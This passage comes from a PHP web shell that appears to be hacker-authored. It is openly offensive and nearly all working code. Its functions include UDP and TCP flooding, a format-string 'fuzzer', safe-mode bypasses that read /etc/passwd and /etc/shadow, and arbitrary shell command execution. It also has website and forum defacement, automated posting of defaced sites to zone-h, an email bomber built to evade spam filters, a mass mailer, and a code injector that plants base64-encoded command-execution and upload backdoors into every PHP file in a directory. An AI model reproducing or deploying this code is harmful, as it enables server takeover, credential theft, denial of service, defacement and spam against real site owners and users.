4176 $counter = $no0fBytes;
4177 $maxTime = time() + $executionTime;;
4178 while($counter--)
4179 {
4180 $data .= "X";
4181 }
4182 $data .= " Dhanush";
4183
4184 while(1)
4185 {
4186 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
4187 if($socket)
4188 {
4189 fwrite($socket , $data);
4190 fclose($socket);
4191 $packets++;
4192 }
4193 if(time() >= $maxTime)
4194 {
4195 break;
4196 }
4197 }
4198 echo "Dos Completed!<br>";
4199 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
4200 echo "Total Number of Packets Sent : " . $packets . "<br />";
4201 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
4202 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
4203 }
4204}
4205else if(isset($_GET['fuzzer']))
4206{
4207 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
4208 {
4209 $IP=$_GET['ip'];
4210 $port=$_GET['port'];
4211 $times = $_GET['exTime'];
4212 $timeout = $_GET['timeout'];
4213 $send = 0;
4214 $ending = "";
4215 $multiplier = $_GET['multiplier'];
4216 $data = "";
4217 $mode="tcp";
4218 $data .= "GET /";
4219 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
4220 if($_GET['type'] == "tcp")
4221 {
4222 $mode = "tcp";
4223 }
4224
4225 while($multiplier--)
4226
4227 {
4228 $data .= urlencode($_GET['no0fBytes']);
4229 }
4230 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
4231 $data .= "by-Dhanush".$ending;
4232 $length = strlen($data);
4233
4234
4235 echo "Sending Data :- <br /> <p align='center'>$data</p>";
4236
4237 for($i=0;$i<$times;$i++)
4238 {
4239 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
4240 if($socket)
4241 {
4242 fwrite($socket , $data , $length );
4243 fclose($socket);
4244 }
4245 }
4246 echo "Fuzzing Completed!<br>";
4247 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
4248 echo "Total Number of Packets Sent : " . $times . "<br />";
4249 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
4250 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
4251 }
4252}
4253else if(isset($_GET['bypassit']))
4254{
4255 echo "<BR>";
4256 if(isset($_GET['copy']))
4257 {
4258 if(@copy($_GET['copy'],"test1.php"))
4259 {
4260 $fh=fopen("test1.php",'r');
4261 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea>";
4262 @fclose($fh);
4263 unlink("test1.php");
4264 }
4265 }
4266 else if(isset($_GET['filecontents']))
4267 {
4268 echo "<textarea cols=100 rows=20 class=box readonly>";
4269 echo file_get_contents($_GET['filecontents']);
4270 echo "</textarea>";
4271 }
4272 else if(isset($_GET['stream']))
4273 {
4274 echo "<textarea cols=100 rows=20 class=box readonly>";
4275 $file=$_GET['stream'];
4276 if ($stream = fopen($file, 'r')) {
4277 echo stream_get_contents($stream, -1, 0);
4278 fclose($stream);
4279 }
4280
4281 echo "</textarea>";
4282 }
4283 else if(isset($_GET['curl']))
4284 {
4285 $ch=curl_init("file://" . $_GET[curl]);
4286 curl_setopt($ch,CURLOPT_HEADERS,0);
4287 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
4288 $file_out=curl_exec($ch);
4289 curl_close($ch);
4290 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea>";
4291 }
4292 else if(isset($_GET['include']))
4293 {
4294 if(file_exists($_GET['include']))
4295 {
4296 echo "<textarea cols=100 rows=20 class=box readonly>";
4297 @include($_GET['include']);
4298 echo "</textarea>";
4299 }
4300 else
4301 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
4302 }
4303 else if(isset($_GET['id']))
4304 {
4305 echo "<textarea cols=100 rows=20 class=box readonly>";
4306 for($uid=0;$uid<60000;$uid++)
4307 {
4308 $ara = posix_getpwuid($uid);
4309 if (!empty($ara))
4310 {
4311 while (list ($key, $val) = each($ara))
4312 {
4313 print "$val:";
4314 }
4315 print "\n";
4316 }
4317 }
4318 echo "</textarea>";
4319 }
4320 else if(isset($_GET['tempnam']))
4321 {
4322 echo "<textarea cols=100 rows=20 class=box readonly>";
4323 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
4324 $fp = fopen ( $mytmp, 'r' );
4325 while(!feof($fp))
4326 echo fgets($fp);
4327 fclose ( $fp );
4328 echo "</textarea>";
4329 }
4330 else if(isset($_GET['symlnk']))
4331 {
4332 echo "<textarea cols=100 rows=20 class=box readonly>";
4333 @mkdir("mydhanush",0777);
4334 @chdir("mydhanush");
4335 execmd("ln -s /etc/passwd");
4336
4337 echo file_get_contents($curr_url . "/mydhanush/passwd");
4338 echo "</textarea>";
4339 }
4340 if(isset($_GET['newtype']))
4341 {
4342 $filename = $_GET['newtype'];
4343 echo "<textarea cols=100 rows=20 class=box readonly>";
4344 if($_GET['optiontype'] == "xxd")
4345 echo execmd("xxd ".$filename);
4346 else if($_GET['optiontype'] == "rev")
4347 echo execmd("rev ".$filename);
4348 if($_GET['optiontype'] == "tac")
4349 echo execmd("tac ".$filename);
4350 if($_GET['optiontype'] == "more")
4351 echo execmd("more ".$filename);
4352 if($_GET['optiontype'] == "less")
4353 echo execmd("less ".$filename);
4354 if($_GET['optiontype'] == "awk")
4355 echo execmd("awk '{ print }' ".$filename);
4356 echo "</textarea>";
4357 }
4358 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 2px;" /><BR><BR><BR>';
4359}
4360// Deface Website
4361else if(isset($_GET['deface']))
4362{
4363 $myfile = fopen($_GET['deface'],'w');
4364 if(fwrite($myfile, base64_decode($ind)))
4365 {fclose($myfile);
4366 echo "Index Defaced Successfully";}
4367 else
4368 echo "Donot have write permission";
4369}
4370else if(isset($_GET['perms']))
4371{
4372?><br>
4373 <form>
4374 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
4375 <table align="center" border="1" style="width:40%;border-color:#333333;border-collapse:collapse;">
4376 <tr>
4377 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4378 </tr>
4379 <tr>
4380 <td colspan="2" align="center" style="height:60px">
4381 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" />
4382 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4383 </td>
4384 </tr>
4385 </table>
4386
4387 </form>
4388 <?php
4389}
4390else if(isset($_GET["chmode"]))
4391{
4392 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
4393 {
4394 echo '<br>';
4395 $perms = 0;
4396 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
4397 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
4398 if(@chmod($_GET['myfilename'],$perms))
4399 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
4400 else
4401 echo "<center><blink>Cannot Change File Permissions</blink></center>";
4402 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4403 }
4404}
4405else if(isset($_GET['rename']))
4406{
4407?><BR>
4408 <form>
4409 <table border="0" cellpadding="7" cellspacing="3">
4410 <tr>
4411 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
4412 </tr>
4413 <tr>
4414 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
4415 </tr>
4416 <tr>
4417 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
4418 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4419 </td>
4420 </tr>
4421 </table>
4422 </form>
4423 <?php
4424
4425}
4426else if(isset($_GET['renamemyfile']))
4427{
4428 if(isset($_GET['to']) && isset($_GET['file']))
4429 {
4430 echo '<br>';
4431 if(!rename($_GET['file'], $_GET['to']))
4432 echo "Cannot Rename File";
4433 else
4434 echo "<font class=txt>File Renamed Successfully</font>";
4435 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4436 }
4437}
4438else if(isset($_GET['open']))
4439{
4440 if(is_file($_GET['myfilepath']))
4441 {
4442 $owner = "0/0";
4443 if($os == "Linux")
4444 $owner = getOGid($_GET['myfilepath']);
4445 ?>
4446 <form>
4447 <table style="width:57%;">
4448 <tr align="left">
4449 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
4450 </tr>
4451 <tr>
4452 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4453 </tr>
4454 </table>
4455 <textarea name="content" rows="15" cols="100" class="box"><?php
4456 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
4457 if($content)
4458 {
4459 echo $content;
4460 }
4461 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
4462 {
4463 if(filesize($_GET['myfilepath']) != 0 )
4464 {
4465 fopen($_GET['myfilepath']);
4466 while(!feof())
4467 {
4468 echo htmlspecialchars(fgets($_GET['myfilepath']));
4469 }
4470 }
4471 }
4472
4473 ?>
4474 </textarea><br />
4475 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
4476 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
4477 </form>
4478 <?php
4479 }
4480 else
4481 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
4482}
4483else if(isset($_POST['file']) && isset($_POST['content']))
4484{
4485 echo '<BR>';
4486 if(file_exists($_POST['file']))
4487 {
4488 $handle = fopen($_POST['file'],"w");
4489 if(fwrite($handle,$_POST['content']))
4490 echo "<font class=txt>File Saved Successfully!</font>";
4491 else
4492 echo "Cannot Write into File";
4493 }
4494 else
4495 {
4496 echo "File Name Specified does not exists!";
4497 }
4498 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>';
4499}
4500else if(isset($_POST["SendNowToZoneH"]))
4501{
4502 $hacker = $_POST['defacer'];
4503 $method = $_POST['hackmode'];
4504 $neden = $_POST['reason'];
4505 $site = $_POST['domain'];
4506
4507 if (empty($hacker))
4508 {
4509 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
4510 }
4511 elseif($method == "--------SELECT--------")
4512 {
4513 die("<center><font size=3>[-] You Must Select The Method !</center>");
4514 }
4515 elseif($neden == "--------SELECT--------")
4516 {
4517 die("<center><font size=3>[-] You Must Select The Reason</center>");
4518 }
4519 elseif(empty($site))
4520 {
4521 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
4522 }
4523 // Zone-h Poster
4524 function ZoneH($url, $hacker, $hackmode,$reson, $site )
4525 {
4526 $k = curl_init();
4527 curl_setopt($k, CURLOPT_URL, $url);
4528 curl_setopt($k,CURLOPT_POST,true);
4529 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
4530 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
4531 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
4532 $kubra = curl_exec($k);
4533 curl_close($k);
4534 return $kubra;
4535 }
4536
4537 $i = 0;
4538 $sites = explode("\n", $site);
4539 echo "<pre class=ml1 style='margin-top:5px'>";
4540 while($i < count($sites))
4541 {
4542 if(substr($sites[$i], 0, 4) != "http")
4543 {
4544 $sites[$i] = "http://".$sites[$i];
4545 }
4546 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
4547 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
4548 ++$i;
4549 }
4550
4551 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
4552}
4553else if(isset($_GET['executemycmd']))
4554{
4555 $comm = $_GET['executemycmd'];
4556 chdir($_GET['executepath']);
4557 echo shell_exec($comm);
4558}
4559// View Passwd file
4560else if(isset($_GET['passwd']))
4561{
4562 $test='';
4563 $tempp= tempnam($test, "cx");
4564 $get = "/etc/passwd";
4565 $name=@posix_getpwuid(@fileowner($get));
4566 $group=@posix_getgrgid(@filegroup($get));
4567 $owner = $name['name']. " / ". $group['name'];
4568 ?>
4569 <table style="width:57%;">
4570 <tr>
4571 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
4572 </tr>
4573 <tr>
4574 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4575 </tr>
4576 </table>
4577 <?php
4578 if(copy("compress.zlib://".$get, $tempp))
4579 {
4580 $fopenzo = fopen($tempp, "r");
4581 $freadz = fread($fopenzo, filesize($tempp));
4582 fclose($fopenzo);
4583 $source = htmlspecialchars($freadz);
4584 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
4585 unlink($tempp);
4586 }
4587 else
4588 {
4589 ?>
4590 <form>
4591 <input type="hidden" name="etcpasswd">
4592 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
4593 <tr>
4594 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
4595 </tr>
4596 <tr>
4597 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
4598 </tr>
4599 <tr>
4600 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
4601 </tr>
4602 </table><br>
4603 </form>
4604 <?php
4605 }
4606 ?>
4607 <br />
4608 <input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>
4609 <?php
4610}
4611else if(isset($_GET['shadow']))
4612{
4613 $test='';
4614 $tempp= tempnam($test, "cx");
4615 $get = "/etc/shadow";
4616 if(copy("compress.zlib://".$get, $tempp))
4617 {
4618 $fopenzo = fopen($tempp, "r");
4619 $freadz = fread($fopenzo, filesize($tempp));
4620 fclose($fopenzo);
4621 $source = htmlspecialchars($freadz);
4622 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
4623 unlink($tempp);
4624 }
4625}
4626else if(isset($_GET['bomb']))
4627{
4628 ?><div id="showmail"></div>
4629 <form>
4630 <table id="margins" style="width:100%;">
4631 <tr>
4632 <td style="width:30%;">To</td>
4633 <td>
4634 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
4635 </td>
4636 </tr>
4637 <tr>
4638
4639 <td style="width:30%;">Subject</td>
4640 <td>
4641 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
4642 </td>
4643 </tr>
4644 <tr>
4645 <td style="width:30%;">No. of Times</td>
4646 <td>
4647 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
4648 </td>
4649 </tr>
4650 <tr>
4651 <td style="width:30%;">Pad your message (Less spam detection)</td>
4652 <td><input type="checkbox" name="padding"/></td>
4653 </tr>
4654 <tr>
4655 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
4656 </tr>
4657 <tr>
4658 <td rowspan="2">
4659 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
4660 </td>
4661 </tr>
4662 </table>
4663 </form>
4664 <?php
4665}
4666
4667//Mass Mailer
4668else if(isset($_GET['mail']))
4669{
4670 ?><div id="showmail"></div>
4671 <div align="left">
4672 <form>
4673 <table align="left" style="width:100%;">
4674 <tr>
4675 <td style="width:10%;">From</td>
4676 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'Hello@abcd.in')this.value = '';" onBlur="if(this.value=='')this.value='Hello@abcd.in';"/></td>
4677 </tr>
4678
4679 <tr>
4680 <td style="width:20%;">To</td>
4681 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
4682 </tr>
4683
4684 <tr>
4685 <td style="width:20%;">Subject</td>
4686 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
4687 </tr>
4688
4689
4690 <tr>
4691 <td colspan="2">
4692 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!! Patch your site.....</textarea>
4693 </td>
4694 </tr>
4695
4696
4697 <tr>
4698 <td rowspan="2">
4699 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
4700 </td>
4701 </tr>
4702 </table>
4703 </form></div>
4704 <?php
4705}
4706// Get Domains
4707else if(isset($_REQUEST["symlinkserver"]))
4708{
4709 ?>
4710 <center><table><tr>
4711 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
4712 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
4713 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
4714 </tr></table></center><br>
4715 <div id="showdata"></div><?php
4716}
4717// Forum Manager
4718else if(isset($_REQUEST["forum"]))
4719{ ?>
4720 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
4721 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
4722 <td><a href=# onClick="getdata('massdeface')"><font class=txt size="4">| Mass Defacer |</font></a></td>
4723 </tr></table></center><br><div id="showdata"></div>
4724 <?php
4725}
4726// Sec info
4727else if(isset($_GET['secinfo']))
4728{ ?><div id=showdata></div>
4729<center><div id="showmydata"></div>
4730</center>
4731<br><center><font size=5>Server security information</font><br><br></center>
4732 <table class="btmtbl" style="width:100%;" border="1">
4733 <tr>
4734 <td style="width:7%;">Curl</td>
4735 <td style="width:7%;">Oracle</td>
4736 <td style="width:7%;">MySQL</td>
4737 <td style="width:7%;">MSSQL</td>
4738 <td style="width:7%;">PostgreSQL</td>
4739 <td style="width:12%;">Open Base Directory</td>
4740 <td style="width:10%;">Safe_Exec_Dir</td>
4741 <td style="width:7%;">PHP Version</td>
4742 <td style="width:7%;">Magic Quotes</td>
4743 <td style="width:7%;">Server Admin</td>
4744 </tr>
4745 <tr>
4746 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
4747 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
4748 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
4749 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
4750 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
4751 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
4752 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font class='txt'>$df</font></b>";};} ?></font></td>
4753 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
4754 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
4755 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
4756 </tr>
4757</table><br> <?php
4758 mysecinfo();
4759}
4760// Code Injector
4761
4762else if(isset($_GET['injector']))
4763{
4764 if($os != "Windows")
4765 $injectcode = "PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+";
4766 else
4767 {
4768 $injectcode = "PD9waHAgJHBhc3N3cmQgPSA8PDxFT0QKMWViODJhOTE1YzczNjMxZTZlYmEyM2QwYzE1ODZkMzQKRU9EOwokZGhwYXNzd2QgPSA8PDxFT0QKZGhwYXNzd2QKRU9EOwokdXBsb2FkZWQgPSA8PDxFT0QKdXBsb2FkZWQKRU9EOwokbmFtZSA9IDw8PEVPRApuYW1lCkVPRDsKJHRtcF9uYW1lID0gPDw8RU9ECnRtcF9uYW1lCkVPRDsKaWYgKGlzc2V0ICgkX0dFVFskZGhwYXNzd2RdKSBhbmQgbWQ1KCRfR0VUWyRkaHBhc3N3ZF0pPT0kcGFzc3dyZCkKez8+PGZvcm0gZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhIG1ldGhvZD1QT1NUIGFjdGlvbj0+dXBsb2FkOiA8aW5wdXQgbmFtZT11cGxvYWRlZCB0eXBlPWZpbGUgLz48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9VXBsb2FkIC8+PC9mb3JtPgo8P3BocCAKaWYoaXNzZXQoJF9GSUxFU1skdXBsb2FkZWRdWyRuYW1lXSkpCnsKJHVwbG9hZGVkID0gPDw8RU9ECnVwbG9hZGVkCkVPRDsKJHRhcmdldF9wYXRoID0gPDw8RU9ECi4vCkVPRDsKJHRhcmdldF9wYXRoID0gJHRhcmdldF9wYXRoIC4gYmFzZW5hbWUoICRfRklMRVNbJHVwbG9hZGVkXVskbmFtZV0pOwppZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1skdXBsb2FkZWRdWyR0bXBfbmFtZV0sICR0YXJnZXRfcGF0aCkpIHtlY2hvICR1cGxvYWRlZDt9fX0KPz4=";
4769 }
4770 ?>
4771 <form method='POST'>
4772 <table id="margins">
4773 <tr>
4774 <td width="100" class="title">
4775 Directory
4776 </td>
4777 <td>
4778 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
4779 </td>
4780
4781 </tr>
4782 <tr>
4783 <td class="title">
4784 Mode
4785 </td>
4786 <td>
4787 <select style="width: 400px;" name="mode" class="box">
4788 <option value="Apender">Apender</option>
4789 <option value="Overwriter">Overwriter</option>
4790 </select>
4791 </td>
4792 </tr>
4793 <tr>
4794 <td class="title">
4795 File Type
4796 </td>
4797 <td>
4798 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
4799 </td>
4800 </tr>
4801 <tr>
4802 <td>Create A backdoor by injecting this code in every php file of current directory</td>
4803 </tr>
4804
4805 <tr>
4806 <td colspan="2"><?php if($os == "Windows")echo "<i>Default Password is : <b>Iamthelord#</b> (change to yours using MD5)</i> Example : .php?dhpasswd=Iamthelord#"; ?><BR>
4807 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode($injectcode); ?></textarea>
4808 </td>
4809 </tr>
4810 <tr>
4811 <td rowspan="2">
4812 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
4813 </td>
4814 </tr>
4815 </form>
4816 </table><div id="showinject"</div>
4817 <?php
4818}
4819// Bypass
4820else if(isset($_GET["bypass"]))
4821{
4822 ?><center><div id="showmydata"></div></center>
4823 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;border-collapse:collapse;">
4824 <tr>
4825 <td align="center" colspan="2"><font size="3">Safe mode bypass</font></td>
4826 </tr>
4827 <tr>
4828 <td align="center">
4829 <p>Using copy() function</p>
4830 <form onSubmit="bypassfun('copy',copy.value);return false;">
4831 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
4832 </form>
4833 </td>
4834 <td align="center">
4835 <p>Using File contents function</p>
4836 <form onSubmit="bypassfun('filecontents',filecontents.value);return false;">
4837 <input type="text" name="filecontents" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('filecontents',filecontents.value)" value="bypass" class="but">
4838 </form>
4839 </td>
4840 </tr>
4841
4842 <tr>
4843 <td align="center">
4844 <p>Using Stream contents function</p>
4845 <form onSubmit="bypassfun('stream',stream.value);return false;">
4846 <input type="text" name="stream" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('stream',stream.value)" value="bypass" class="but">
4847 </form>
4848 </td>
4849 <td align="center">
4850 <p>Using Curl() function</p>
4851 <form onSubmit="bypassfun('curl',curl.value);return false;">
4852 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
4853 </form>
4854 </td>
4855 </tr>
4856
4857 <tr>
4858 <td align="center">
4859 <p>Bypass using include()</p>
4860 <form onSubmit="bypassfun('include',include.value);return false;">
4861 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
4862 </form>
4863 </td>
4864 <td align="center">
4865 <p>Using id() function</p>
4866 <form onSubmit="bypassfun('id',id.value);return false;">
4867 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
4868 </form>
4869 </td>
4870 </tr>
4871
4872 <tr>
4873 <td align="center">
4874 <p>Using tempnam() function</p>
4875 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
4876 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
4877 </form>
4878 </td>
4879 <td align="center">
4880 <p>Using symlink() function</p>
4881 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
4882 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
4883 </form>
4884 </td>
4885 </tr>
4886 <tr>
4887 <td colspan=2 align="center">
4888 <p>Using Bypass function</p>
4889 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
4890 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
4891 <select id="optiontype" class=sbox>
4892 <option value="tac">tac</option>
4893 <option value="more">more</option>
4894 <option value="less">less</option>
4895 <option value="rev">rev</option>
4896 <option value="xxd">xxd</option>
4897 <option value="awk">awk</option>
4898 </select>
4899 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
4900 </form>
4901 </td>
4902 </tr>
4903 </table>
4904 </form>
4905 <?php
4906}
4907//fuzzer
4908else if(isset($_GET['fuzz']))
4909{
4910 ?>
4911 <form method="GET">
4912 <table id="margins">
4913 <tr>
4914 <td width="400" class="title">
4915 IP
4916 </td>
4917 <td>
4918 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
4919 </td>
4920 </tr>
4921
4922 <tr>
4923 <td class="title">
4924 Port
4925 </td>
4926 <td>
4927 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
4928 </td>
4929 </tr>
4930
4931 <tr>
4932 <td class="title">
4933 Timeout
4934 </td>
4935 <td>
4936 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
4937 </td>
4938 </tr>
4939
4940
4941 <tr>
4942 <td class="title">
4943 No of times
4944 </td>
4945 <td>
4946 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
4947 </td>
4948 </tr>
4949
4950 <tr>
4951 <td class="title">
4952 Message (The message Should be long and it will be multiplied with the value after it)
4953 </td>
4954 <td>
4955 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
4956 </td>
4957 <td>
4958 x
4959 </td>
4960 <td width="20">
4961 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
4962 </td>
4963 </tr>
4964
4965 <tr>
4966 <td rowspan="2">
4967 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
4968 </td>
4969 </tr>
4970 </table>
4971 </form><div id="showdos"></div>
4972 <?php
4973}
4974// Zone-h Poster
